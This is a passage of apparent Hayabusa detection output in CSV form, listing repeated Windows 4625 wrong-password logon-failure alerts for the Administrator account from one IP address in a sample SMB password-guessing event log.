NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: 